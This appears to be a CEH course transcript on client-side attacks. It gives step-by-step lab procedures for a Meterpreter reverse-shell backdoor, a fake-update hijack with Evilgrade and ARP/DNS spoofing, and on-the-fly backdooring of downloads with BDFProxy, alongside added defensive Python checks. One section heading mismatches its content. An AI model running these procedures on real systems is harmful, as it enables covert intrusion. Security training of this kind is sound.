EC Council CEH 312-50 V11 Topic: Gaining Access – Client Side Attacks Part 2
December 19, 2022

5. Using A Basic Delivery Method To Test The Backdoor & Hack Windows 10

Now the backdoor that we created uses a reverse payload. So, like I said before, it does not open a port on the target computer. It actually connects from the target computer to our computer. And by doing that, it will bypass firewalls and look less suspicious. So for this to work, we need to open a port on our computer so that the backdoor can connect from the target computer to us on that port. If you remember, when I created the backdoor, I set the port to 8080. So I need to open that port on my Kali machine so that when the target person executes the backdoor, the backdoor can connect back to me on port 8080. So I'm just going to write down the name of the payload that we used, because that's very important when you're listening for incoming connections. We used a payload that's written in Go, and that was meterpreter/rev_https, which is a reverse HTTPS payload. Now this is not a command; I'm just writing it in here as a note.

So just keep this in mind. And we used port 8080 for the reverse connection. These are the most important things to keep in mind when listening for incoming connections. So I'm going to split the screen, and I'm going to listen for incoming connections in here. To do that, I'm going to use the Metasploit framework. All you have to do to run Metasploit is launch msfconsole. Now, the Metasploit Framework is a huge framework for penetration testing. The Meterpreter backdoor, or the Meterpreter payload that Veil-Evasion created for us, is actually programmed by the people who made Metasploit. That's why we're using Metasploit to listen for incoming connections. Veil-Evasion actually uses Metasploit to generate the backdoor that we chose in the previous video. So to listen for incoming connections, we're going to use a module in Metasploit. Now Metasploit, as I said, is a huge framework with a lot of modules. The module that we're interested in is the one that allows us to listen for incoming connections from a meterpreter payload. To use that module, we're going to type use, and then we're going to specify the module name.

And the module name is exploit/multi/handler. Okay, so the use command is used to specify the module that we want to use, and we're using a module called exploit/multi/handler that allows us to listen for incoming connections. I'm going to hit Enter. I was already in that module, so you can see that nothing changed for me, but for you, it should navigate to that module. And I'm going to do show options to see the options that I can set for this module, and you can see that you can specify different options for it. The most important thing that you want to specify is the payload. You can see in here that for me it's set to windows/meterpreter/reverse_tcp. And if you remember what we used, we used meterpreter reverse_https, not reverse_tcp. You want to change this. The first part is fine because our target is going to be Windows, but you want to change reverse_tcp to reverse_https. And you can change that exactly the same way that we did with Veil-Evasion: you type in set, and you put the option name that you want to change.

And we want to change the option for the payload. So we're going to say set payload, and we're going to set that to windows/meterpreter/reverse_https this time. OK, so we're setting an option. We're setting the payload to windows/meterpreter/reverse_https. This payload should correspond to the payload you selected in the backdoor. We used meterpreter reverse_https in the backdoor; that's why here we're using reverse_https as well. If you chose reverse_http, then set this to reverse_http. If you used reverse_tcp, then set this to reverse_tcp, and so on. So I'm going to hit Enter for this, and that's going to do it for me. And if I do show options now, you'll see the payload changed to windows/meterpreter/reverse_https. Now, the same concept applies to all the other options. So you want to change the LHOST to our IP address. You can see that this is already set to the right one for me. If it was incorrect for you, all you have to do is set LHOST and enter your IP address. You can get the IP address using ifconfig, like I showed you in the previous lecture. So for me, it's 10.20.14.213. And again, this is the same IP that I used when I created my backdoor.

And the same goes for the port. You want to set the same port. So we're going to set LPORT to 8080, because that's the port that we used when we generated the backdoor. So again, the main idea with this is that you want to set the payload, the LHOST, and the LPORT to exactly the same options that you chose when you created the backdoor. Once we're done with that, we're going to do show options one more time, and you'll see that I have my payload set properly to windows/meterpreter/reverse_https, my LHOST, and my LPORT, and all of that is done properly. So now all we have to do is type exploit. And now Metasploit is waiting for connections, as you can see, on port 8080 and on my IP address, which is 10.20.14.213. So now, if anybody opens the backdoor that we created in the previous lecture, because it's a reverse backdoor, the backdoor will try to connect to the IP that we set when we created the backdoor, which was 10.20.14.213, and it'll try to connect on port 8080. It's going to come to this computer, and this computer is already waiting for that connection with this multi/handler module. So the connection will be established, and then I'll be able to control the target computer and, basically, hack it and have full control over it. Next, I'll show you a very simple method for delivering the backdoor to the target computer, as well as how to test the backdoor and make sure that it works properly.
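The reason the reverse payload gets through a firewall is that, from the target's side, it is just another outbound connection. The example below is added here and is not part of the course; it shows the defender's view of that same connection: a small triage routine over constructed host-firewall lines (format and sample values are assumptions) that flags outbound connections opened by binaries running from user-writable paths, with the port the lecture uses (8080) treated as a non-browser port.

```python
"""Triage outbound connections for reverse-connect backdoor behaviour.

Added example, not part of the course: the backdoor above never listens on
the target; it calls out to the attacker's listener (in the lecture,
10.20.14.213:8080), so on the victim the useful signal is *which process*
opened the outbound connection, not the direction of the traffic.

Assumed (constructed) input, one line per outbound connection:
    <timestamp> <process image path> <local ip> -> <remote ip>:<remote port>
"""
import re
from dataclasses import dataclass
from typing import List, Optional

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proc>.+?)\s+(?P<src>\d+\.\d+\.\d+\.\d+)\s*->\s*"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)$"
)
# Locations an ordinary user can write to; a freshly downloaded or
# "updated" binary runs from one of these, a vendor-installed one rarely does.
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\desktop\\")
WEB_PORTS = {80, 443}


@dataclass
class Finding:
    ts: str
    proc: str
    dst: str
    dport: int
    severity: str
    reason: str


def parse_line(line: str) -> Optional[dict]:
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def assess(rec: dict) -> Optional[Finding]:
    proc = rec["proc"]
    dport = int(rec["dport"])
    if not any(p in proc.lower() for p in USER_WRITABLE):
        return None  # vendor-installed binaries are out of scope for this rule
    reason = "outbound connection from binary in user-writable path"
    severity = "medium"
    if dport not in WEB_PORTS:
        # reverse_https on 8080 looks like TLS, but a real browser would use 443
        reason += f"; non-standard port {dport}"
        severity = "high"
    return Finding(rec["ts"], proc, rec["dst"], dport, severity, reason)


def triage(lines: List[str]) -> List[Finding]:
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec:
            f = assess(rec)
            if f:
                out.append(f)
    return out


# Constructed sample log mirroring the lecture's test (not real telemetry).
SAMPLE_LOG = r"""
2022-12-19T10:01:02Z C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe 10.20.14.50 -> 142.250.74.36:443
2022-12-19T10:01:09Z C:\Windows\System32\svchost.exe 10.20.14.50 -> 20.190.160.14:443
2022-12-19T10:02:31Z C:\Users\IEUser\Downloads\rev_https_8080.exe 10.20.14.50 -> 10.20.14.213:8080
2022-12-19T10:03:10Z C:\Users\IEUser\Downloads\installer.exe 10.20.14.50 -> 104.18.26.100:443
2022-12-19T10:05:44Z C:\Users\IEUser\AppData\Local\Temp\update.exe 10.20.14.50 -> 10.20.14.213:8080
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity}] {f.ts} {f.proc} -> {f.dst}:{f.dport}  {f.reason}")
```

The rule deliberately does not try to inspect the traffic: reverse_https is encrypted end to end, so the process origin and the port are what remain visible. Egress filtering that only allows browsers and updaters to reach the internet, and logs everything else, turns this from a triage script into a block.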

6. Hacking Windows 10 Using Fake Update

Now we're ready to receive connections from our backdoor. So we created the backdoor, we set the payload, and we're listening for incoming connections here for any connection that comes in from that backdoor, on the same port, on the same IP. So now if a person runs that backdoor, we will receive the connection back here on this computer. What we'll do now is test the backdoor to make sure it works. And to do that, we're going to use a very basic delivery method. Later on in the course, we're going to talk about smart delivery methods that will trick the person into opening the file that we're sending to them. For now, we're just doing a very basic example to test our very basic backdoor. So to do that, we're just going to put the backdoor on our web server and then download it from the target computer. There's nothing smart about this.

And you probably won't be able to deliver the backdoor to a real person this way. So we're only doing this for testing, to make sure our backdoor works. Kali comes with a web server, and what that means is, basically, that you can use Kali as a website. So what we're going to do is put that backdoor on that website, and then just download it from the target Windows machine. Now, the website directory where you should store the website files is /var/www/html. So I'll show you where it is. If you just click in here on the path and then put a forward slash, it will allow you to manually type the path that you want to go to. So you want to go to /var/www/html. This is the location where the website files are stored. Now, for you, you'll probably only have index.html. You won't have all of that stuff; that's just stuff that I created while I was testing a few things. The index is the main page that people usually see when they browse to this website. So what I'm going to do here is, first of all, create a directory, which I'm going to call EvilFiles. Every time we create a backdoor or a keylogger, we're going to put it here and then download it to the Windows machine to test it. And again, later on in the delivery methods section, we're going to talk about smart delivery methods. For now, we're only going to be creating the evil files and testing them to make sure that they work as expected.

So I'm going to call this directory EvilFiles, and inside it I'm going to put the backdoor that we created before. We used Veil-Evasion to create that backdoor, and Veil-Evasion actually gave us the full path of it when we created it, if you remember. Or you can go back now to that lecture and have a look at it. So I'm just going to press Ctrl+T to open a new tab. And then again, I'm going to click on the path in here, and I'm going to put a forward slash to manually enter the path. Then we're going to go to /var/lib/veil-evasion/output/compiled, hit Enter, and you'll see the backdoor that I created right here, named rev_https_8080. So I'm going to copy this and paste it in here. And that's it. Now we can download this file from the website that Kali has. To start the web server, to start the website, we have to start its service from the command prompt. And to do that, we're going to do service apache2 start.

So the command is service, to start the service; apache2 is the name of the web server; and then we want to start this web server. I'm going to hit Enter. And because we didn't get any errors, that means the command got executed properly. Now everything is done. The IP of the Kali machine was 10.20.14.213. It's the same IP that we're listening on here, and it's the same IP that you'd get if you ran ifconfig. So I'm going to go to my Windows machine and I'm going to navigate to the IP address of the Kali machine, which is 10.20.14.213. This will open the basic index.html that I showed you, and it basically just says "It works", telling us that the web server is working and the website is working. This is all contained within /var/www/html. So if I wanted to go to the directory where we put the backdoor, then we're just going to go to /EvilFiles, because that's what we called it. I'm going to hit Enter, and you can see the backdoor that we created in the previous lecture, which we called rev_https_8080. So if I click on that, it's going to download it for me. And like I said before, this is not the smartest way to deliver the backdoor, but right now, all we want to do is test the backdoor and make sure that it works.

So if I click on the downloads and run the backdoor, it's going to tell me that this is an executable, so be careful when you run it. But this is not detecting a virus. It's literally just saying, "Be careful when you run an exe." I'm going to run it anyway. And once we come back here, you'll see that we received a connection from the target machine. So we didn't connect to the target computer; the target computer connected back to us. You can see the IP of the target computer, which is 10.20.14.6. That IP connected back to us on port 8080 right here. So basically, now we have full control over that computer. Right here, you can see that we have a meterpreter session. And what Meterpreter allows us to do is literally anything that the user can do on their computer. We'll see how we can use meterpreter later on in the post-connection attacks. For now, we can see that the backdoor is working, and if we do sysinfo, you can see that we are inside the MSEdge Windows 10 machine. It's Windows 10 right here, it's x64, it uses US English, and the meterpreter is x86/windows. So, as I said, now we can do anything we want on the target machine, and we'll talk about how to use meterpreter later on in the post-connection section. But again, basically right now, we have hacked the target computer and have full control over it.

7. Backdooring Downloads on The Fly to Hack Windows 10

Previously, we learned how to create an undetectable backdoor, which is great, but we delivered this backdoor by simply downloading it on the target computer. Now, this will probably not work in real life. Your target will never just download an executable and run it if you ask them to. So in this lecture, I'd like to demonstrate a better delivery method, in which we will spoof an update. When a specific programme on the target computer checks for updates, it will say that there is an update. And when they install that update, they will actually be installing a backdoor. The only limitation to this method is that you need to be the man in the middle. It doesn't matter how, but you need to be able to intercept the connections.

So you can do this using ARP spoofing or a fake access point, as I showed you before, or using any other method that will allow you to intercept the connections. Usually, programmes have a specific domain that they use to check for updates. So let’s say we have the user here that has a specific program and wants to update something. It will send a request to a specific domain. And let’s say this domain is updateserver.com. This will be sent to the DNS server. The DNS server will respond with the IP of the update server, which we have right here. And then the user will send a direct request to the update server looking for updates. If there are updates, then the update server will respond with the updates.

Now, if we're the man in the middle, if we're able to intercept all the requests and responses, then when we get a request for updateserver.com, instead of giving the IP of the update server, we can actually give the IP of a hacker server. This server is running a special programme called Evilgrade. And Evilgrade will tell the user that yes, there is an update, but instead of serving the actual update, it will serve them a backdoor. So when the user agrees to install this update, they'll actually be installing a backdoor on their system. Let's do this practically, and it will become even clearer. Right here, I have my Kali machine. This is the custom image that I made for this course; therefore, it has Evilgrade preinstalled. So first, we'll need to navigate to the location where it's installed. We're going to use the cd command to do that, and it is installed in /opt/evilgrade. And then to run the binary, the programme itself, we're going to do ./evilgrade. Now, using Evilgrade is very simple and very similar to Metasploit. To get a list of all the programmes whose updates we can hijack, we'll run show modules. And as you can see, you have a lot of famous programmes such as WinZip, VMware, Skype, Safari, and so on. Now we're going to be doing this with a programme called DAP, Download Accelerator Plus.

So we have it here. To configure a specific module, all we have to do is just type configure followed by the module name, which is dap; you can replace dap with any module that you want to configure, with any programme that you want to hijack. So I'll hit Enter, and as you can see, I'm now inside the DAP module, and I'll do show options to see all of the options that I can configure. As you can see, we get a list of all the options that we can set, and the main option that we want to change is the agent. This is the path to the programme that will be installed as an update. So in our case, we're going to be replacing this with the backdoor that we created in the previous lecture. To change this option, we'll do set agent, followed by the location where I have my backdoor, which is /var/www/html/backdoor.exe. As you can see, the format for changing options is very similar to Bettercap and Metasploit.

We type set, followed by the option that we want to change, followed by the value. So I'm going to hit Enter, and that's done. The next thing that I want to modify is the endsite, which is the website that will be loaded once the update is successful. I know this one will return a "not found" error; that's why I'm going to change it. You don't have to change it with every module. To change this, we'll just do set endsite, and I'll just set it to the basic domain, which is speedbit.com. And finally, before we run everything, I'm going to do show options one last time to make sure that everything is set as I want it. So I have the agent set to /var/www/html/backdoor.exe; that's perfect, and I have the endsite set the way I want it. So I'm ready to go. And all we need to do now is just type start to start Evilgrade. So right now, if Evilgrade gets a request for an update, it will say yes, there is an update, and it will serve backdoor.exe as the update. The only problem is that it will never get any requests right now, because I am not intercepting connections. I'm still not the man in the middle. Therefore, we're going to become the man in the middle using Bettercap.

Like I said, you can use any method you want to become the man in the middle, but we're just going to do it using ARP spoofing right now. So I'm going to use Bettercap with the exact same command that we've been using before. We're just running Bettercap, connecting it to the network interface, and passing it the spoof caplet so that it runs an ARP spoofing attack, putting me in the middle of the connections. I'm going to hit Enter, and this runs without errors. So that's perfect. We also need to use Bettercap to run a DNS spoofing attack and spoof any request to update.speedbit.com. This is the domain that the target programme uses to check for updates. And we want to spoof DNS requests to this domain so that they return the IP address of the Kali machine, which is running Evilgrade, so that Evilgrade gives them the fake update. Now, I covered how to do DNS spoofing in detail in a full lecture before. So if you don't remember how this works, please go back and revise that lecture, because I'm going to do it a little bit quickly right now. So I'll copy this domain and clear the screen here, and we'll set dns.spoof.all to true, as well as dns.spoof.domains to the domain that we want to spoof. Finally, we'll start the DNS spoofer by typing dns.spoof on, and perfect.

Now it's working, and it's telling us that it's going to spoof any request to update.speedbit.com to the IP of my Kali machine. My Kali machine is running Evilgrade. Evilgrade will say, "Yes, there is a new update," and it will serve them the backdoor that we have right here. And that way, the backdoor will be automatically executed on the target computer. The only problem is that the backdoor will get executed, but we're not listening for incoming connections here, so we won't really get access. Therefore, we need to listen for incoming connections using Metasploit, as I showed you before. Now, I've already configured my multi/handler. Again, I covered this in detail, so if you don't remember how to do it, please go back to that lecture. Right now, I'm just going to show you the options that I set right here. And you can see that I am using windows/meterpreter/reverse_http here, because I'm actually using a different backdoor in my Evilgrade. This backdoor is not a reverse HTTPS one like the one I demonstrated in the previous lectures.

It's actually a reverse HTTP backdoor because, for some reason, I noticed the HTTPS backdoors are not working with Evilgrade. That's why I created a reverse HTTP backdoor specifically for this lecture. So I'm setting my payload to the same payload that's used in my backdoor. I'm setting my IP in here, and I'm setting the LPORT to 8080. So everything is perfect. I'm going to run exploit to listen for incoming connections, and now we're ready to go. So let's go over this one more time before we go to the target computer and check for updates. Right now this computer is intercepting connections because of Bettercap, and it's also going to spoof any request for update.speedbit.com to this IP. This is the IP where Evilgrade is running. Evilgrade is going to say, "Yes, there is a new update." The update is this executable. The target computer will run this executable; it will run it because it thinks it's an update. When this gets executed, it will send a connection to us in our multi/handler. So let's go to the target computer and see if this will actually work as we expected. I've already downloaded and installed the programme whose updates we're trying to hijack. So I'm just going to double-click it to start the program. Now it's just asking me to set it as the default download manager.

I'm going to say no, and I'm going to go to Help, and I'm going to click on Update. Now we're going to say yes, check for updates. I'm just going to uncheck this and click on Next. It's checking for updates now, and it's telling us that there is a new update. So we're going to say Next. And it's telling us right here that this is a critical update. So I'll be like, "Yeah, I want to install this." This will download the update for me and install it, and it's telling us that it's done. Everything is done. We're going to say Next, thank you very much, and Finish. When we return to the Kali machine, we can see that we have a reverse connection from the target. And, just to be sure, we can do sysinfo to see more information, and it's perfect. As you can see, we're inside the target computer, and now we have full access to that computer and can do whatever the normal user can do on their system. Now I will talk more about post-exploitation and how to control the computer using this meterpreter access in the post-exploitation section. But right now we've managed to hack into a computer using a fake update.
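The fake update works only because the client trusts an unauthenticated answer from whatever host the (spoofed) DNS reply pointed at. The example below is added here; it is not part of the course and not the updater of any real product. It shows the checks an update client needs so that a substituted binary is never run: a pinned update host, HTTPS only, no downgrades, and a SHA-256 comparison against the hash carried in the manifest. Hostnames, versions and file contents are constructed.

```python
"""Update-client checks that defeat the fake-update delivery above.

Added example, not from the course and not the updater of any real product:
Evilgrade succeeds because the client accepts "yes, there is an update" and
the binary that follows from whichever host DNS happened to resolve, over
plaintext HTTP. A client that pins its update host, insists on HTTPS,
refuses downgrades and verifies the downloaded file against a SHA-256
obtained over that authenticated channel will not run a substituted file.

Hostnames, versions and file bytes below are constructed.
"""
import hashlib
from dataclasses import dataclass
from typing import Tuple
from urllib.parse import urlparse

UPDATE_HOST = "update.vendor.test"  # constructed; pinned in the client


class UpdateRejected(Exception):
    """Raised when any pre-install check fails."""


@dataclass(frozen=True)
class Manifest:
    version: str   # e.g. "1.2.0"
    url: str       # where the installer is fetched from
    sha256: str    # hex digest of the installer published by the vendor


def version_tuple(v: str) -> Tuple[int, ...]:
    return tuple(int(p) for p in v.split("."))


def check_manifest(m: Manifest, installed: str) -> None:
    u = urlparse(m.url)
    if u.scheme != "https":
        raise UpdateRejected(f"update URL must be https, got {u.scheme!r}")
    if u.hostname != UPDATE_HOST:
        raise UpdateRejected(f"unexpected update host {u.hostname!r}")
    if version_tuple(m.version) <= version_tuple(installed):
        raise UpdateRejected(f"{m.version} is not newer than installed {installed}")
    if len(m.sha256) != 64 or any(c not in "0123456789abcdef" for c in m.sha256.lower()):
        raise UpdateRejected("manifest hash is not a SHA-256 hex digest")


def verify_payload(m: Manifest, payload: bytes) -> str:
    """Compare the downloaded bytes with the digest the manifest promised."""
    digest = hashlib.sha256(payload).hexdigest()
    if digest != m.sha256.lower():
        raise UpdateRejected(f"hash mismatch: expected {m.sha256[:12]}..., got {digest[:12]}...")
    return digest


def should_install(m: Manifest, payload: bytes, installed: str) -> Tuple[bool, str]:
    """Run every check; return (ok, reason). Nothing here executes the file."""
    try:
        check_manifest(m, installed)
        verify_payload(m, payload)
    except UpdateRejected as exc:
        return False, str(exc)
    return True, "all checks passed"


# Constructed sample data.
GENUINE = b"genuine installer bytes (constructed)"
SUBSTITUTED = b"not the installer at all (constructed)"
GOOD = Manifest("1.2.0", f"https://{UPDATE_HOST}/app-1.2.0.exe", hashlib.sha256(GENUINE).hexdigest())
PLAINTEXT = Manifest("1.2.0", f"http://{UPDATE_HOST}/app-1.2.0.exe", GOOD.sha256)
OTHER_HOST = Manifest("1.2.0", "https://10.20.14.213/app-1.2.0.exe", GOOD.sha256)

if __name__ == "__main__":
    cases = [("genuine", GOOD, GENUINE, "1.1.0"),
             ("swapped binary", GOOD, SUBSTITUTED, "1.1.0"),
             ("plaintext manifest", PLAINTEXT, GENUINE, "1.1.0"),
             ("spoofed host", OTHER_HOST, GENUINE, "1.1.0"),
             ("downgrade", GOOD, GENUINE, "1.3.0")]
    for label, m, blob, installed in cases:
        print(f"{label:>18}: {should_install(m, blob, installed)}")
```

The hash only helps if the manifest itself arrived over an authenticated channel: with certificate validation on, a spoofed DNS answer for the pinned host still cannot complete the TLS handshake, so the attacker never gets to hand over a manifest of their own. A signed manifest (code-signing or a detached signature) gives the same property when the download has to come from a mirror.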

8. How to Protect Yourself From The Discussed Delivery Methods

In this lecture, I want to show you another backdoor delivery method. In this method, we're going to wait for our target to download an executable, and we'll backdoor this executable as it's being downloaded. So when they run the executable, they will get the file that they're expecting, but at the same time, a backdoor will run in the background, giving us full access to their computer. The only limitation to this is that you need to be the man in the middle. It doesn't matter how you manage to achieve this position, but you need to be able to intercept connections so you can backdoor the downloads on the fly. To do this, we're going to be using a tool called Backdoor Factory Proxy.

I already installed this tool for you in the custom image that I made for this course. So all we have to do is go to our Kali machine right here and navigate to the location where I installed it. To navigate to a specific location, you can either just click in here and press the forward slash on your keyboard to open the path bar, or you can press Ctrl+L on your keyboard to open the path bar. Once this is open, we need to go to the path where this tool is installed, and it's installed in /opt/BDFProxy. In here, you have the actual executable of the programme and the configuration file. So I'm going to double-click the configuration file to change the configuration. The main thing that you want to change here is the proxy mode, which we have right here. It will be set to regular by default, and you want to change that to transparent. The next thing that we want to modify is the IP of my current computer because, like I said, this tool will backdoor every file the target downloads. So we need to tell this tool my IP address so that the backdoor knows where to connect when it is executed on the target computer. As I previously demonstrated, you can obtain your IP address by running ifconfig; I've already done so and know my IP is 10.0.2.15.

So I'm going to look in here for where it says Windows. This part is the configuration for the Linux targets. If you are targeting Linux, then you also want to modify the IP here. But I'm only going to be targeting Windows. So I'm going to look for Windows, as you can see in this screenshot. And I'm going to change the host to my IP, which is 10.0.2.15, and I'm also going to scroll down to change it for Windows 64-bit. And again, in here, you want to set it to 10.0.2.15, and we're good to go. So I'm going to do Ctrl+S to save and Ctrl+Q to quit, and we are ready to use the tool. Keep in mind the tool is installed as BDFProxy, and the programme that runs the tool is this file right here, bdfproxy.py. Therefore, we're going to go to our terminal and navigate to where the tool is installed. So we're going to do cd /opt/BDFProxy. I'm going to hit Enter. And if I do a quick ls, you'll see we have the programme file in here, and because you see it in green, it means it's an executable. So we can run it by doing ./ followed by the file name, which is bdfproxy.py. I'm going to hit Enter, and this runs without errors. So it's perfect. This programme right now is running on its own, and as soon as it receives a request for an exe, it's going to backdoor that executable. But the way it is right now, it's not going to receive any requests.

Therefore, we need to redirect requests to it. To accomplish this, we must first become the man in the middle. And like I said, you can do this using ARP spoofing. You can do it by using a fake access point and targeting the clients that connect to you, or you can use this tool whenever you manage to become the man in the middle. Regardless of how you manage to do this, I'm going to do it with ARP spoofing because it's the easiest. So we're going to use Bettercap exactly the same way that we've been using it before. We're giving it the interface, which is eth0, and then I'm giving it my ARP spoofing caplet so that it puts me in the middle of the connections, allowing me to intercept data and modify it on the fly. So I'm going to hit Enter. This runs without issues. So it's perfect. Now I'm intercepting the data, and whenever this Windows machine, which is the target, tries to download something, it'll be intercepted by Bettercap. But BDFProxy is still not able to see that there is a download, because these are two separate programs. So what we want to do is link all the data that this programme sees to this programme right here.

And to do so, we'll use iptables, a firewall that comes preinstalled on most Linux systems. Using iptables, we can specify rules that packets have to follow. So I'm going to clear my screen here, and I'm going to use iptables to modify a table called nat and append a PREROUTING rule that will apply to TCP packets that are going to a destination port of 80. And we want to redirect these to port 80, where we have BDFProxy running and waiting to backdoor the downloads. So this is a very simple command. We're using a programme called iptables to modify a table called nat. We're going to append a PREROUTING rule that will apply to TCP packets going to destination port 80, and we're going to redirect them to port 80, where we have this programme BDFProxy running, waiting to backdoor files for me. So I'm going to hit Enter, and I misspelt port; in here there's an r. With that fixed, this runs without errors. So that's perfect. So now we're using Bettercap to intercept data. All this data is going to be redirected using this rule to BDFProxy, which will wait and see if there is an exe being downloaded. It will backdoor it and then serve it back to the target. When the target executes the exe, they'll execute a backdoor that will send a connection back to me. So all I have to do right now is listen for incoming connections. And, as I previously demonstrated, you can accomplish this using the multi/handler. Or, if you're lazy, you can actually use the resource file that the Backdoor Factory creates for us.

So this file will automatically start the multi/handler and listen for incoming connections for all of the payloads that we saw in BDFProxy's configuration file. To run this, all we have to do is first of all run msfconsole as usual, and we're going to pass it -r, meaning "I want to give you a resource file," and then give it the full path of this resource file. Remember that this file was created by BDFProxy and is stored in /opt/BDFProxy. As a result, the file's location will be /opt/BDFProxy followed by the file name. So if I hit Enter now, msfconsole will run, and it will load all the commands stored in the resource file, which will automatically start the multi/handler and configure it with the IPs that we specified when we configured BDFProxy. So now everything is running smoothly, and we are ready to go. So let's go to the target computer, and let's keep it simple when testing. I'm going to try to download something from an HTTP website. So we're going to go to speedbit.com, and we're just going to click on Download. This will actually download DAP, whose updates I showed you how to hijack. You'll get a normal download. We're going to save it to our downloads. This will automatically go to Downloads, which I already have open in here. As you can see, it has the proper icon for the program. This is the normal icon that you'll get if you download SpeedBit. And if you double-click it and run it, it's just an executable.

You will actually get the normal installer. So if this was an actual person, they wouldn't really get suspicious, because they'd be installing the programme that they wanted. What they don't realise is that this programme was backdoored as it was being downloaded. So if we go back to our Kali machine, you'll see that Metasploit is saying that there is a new session opened. All I have to do now is press Enter on my keyboard. Then I'm going to do sessions to list all of the available sessions. As you can see, we have a new session in here. And to enter this session and interact with it, I'm going to do sessions -i followed by the ID of this session, which is number one. And I'm inside my meterpreter session right now, inside the target computer. So to verify this, I'm going to do sysinfo. And as you can see, I'm inside the MSEdge machine right now, and I can control this machine and do anything the normal user can do on their computer. And like I said, I will show you how to control this computer remotely in the post-exploitation section. But for now, we have full access to that computer. And we managed to do this by backdooring a file that the normal user had requested to download, as that file was being downloaded.
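Both the fake-update and the backdoor-on-download deliveries share one precondition the lectures keep repeating: the attacker must first become the man in the middle, here via ARP spoofing. The example below is added here and is not from the course, Bettercap or BDFProxy; it shows how that precondition is visible on the victim. It parses two constructed `ip neigh show` snapshots (the format is assumed, the addresses are made up) and reports the two symptoms of ARP spoofing: the gateway's MAC changing, and one MAC answering for several IPs.

```python
"""Detect the ARP-cache anomalies that the two previous attacks depend on.

Added example, not from the course or from Bettercap/BDFProxy: both the
fake-update and the backdoor-on-download delivery above start with ARP
spoofing so that the attacker sits between the victim and the gateway.
On the victim that shows up in the neighbour cache as the gateway IP
suddenly carrying a different MAC, or as one MAC answering for several IPs.

Input is assumed to be 'ip neigh show' output; both snapshots are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+\S+\s+lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> MAC; entries without an lladdr (FAILED/INCOMPLETE) are skipped."""
    table: Dict[str, str] = {}
    for line in text.strip().splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def shared_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """MACs that appear behind more than one IP in a single snapshot."""
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_bindings(before: Dict[str, str], after: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """(ip, old_mac, new_mac) for every IP whose MAC differs between snapshots."""
    return [(ip, before[ip], after[ip]) for ip in before if ip in after and before[ip] != after[ip]]


def detect(before_text: str, after_text: str, gateway: str) -> List[str]:
    before, after = parse_neigh(before_text), parse_neigh(after_text)
    alerts = []
    for ip, old, new in changed_bindings(before, after):
        tag = "gateway" if ip == gateway else "host"
        alerts.append(f"{tag} {ip} changed MAC {old} -> {new}")
    for mac, ips in shared_macs(after).items():
        alerts.append(f"MAC {mac} now claims several IPs: {', '.join(ips)}")
    return alerts


# Constructed snapshots taken on the victim a minute apart (not real output).
BEFORE = """
10.0.2.1  dev eth0 lladdr 52:54:00:12:35:00 REACHABLE
10.0.2.15 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
10.0.2.7  dev eth0 lladdr 08:00:27:11:22:33 STALE
"""
AFTER = """
10.0.2.1  dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.2.15 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.2.7  dev eth0 lladdr 08:00:27:11:22:33 STALE
10.0.2.9  dev eth0 FAILED
"""

if __name__ == "__main__":
    for a in detect(BEFORE, AFTER, "10.0.2.1"):
        print("ALERT:", a)
```

Treat the output as a signal, not proof: routers with secondary addresses, VRRP pairs and proxy ARP legitimately show one MAC behind several IPs. The durable fixes are on the network side (DHCP snooping with dynamic ARP inspection on managed switches) and, for high-value hosts, a static ARP entry for the gateway so a spoofed reply is simply ignored; for the downloads themselves, the same HTTPS-and-hash discipline that protects an updater protects an installer.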
